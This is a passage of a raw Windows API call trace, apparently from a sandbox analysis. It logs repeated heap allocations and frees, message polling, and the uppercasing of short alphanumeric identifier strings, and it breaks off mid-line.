[0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0198.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13e7) returned 0x34a3438 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.362] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.365] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.366] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.367] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.367] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.367] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.367] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.368] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.368] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.368] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0198.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0198.368] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.369] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.370] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.370] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, 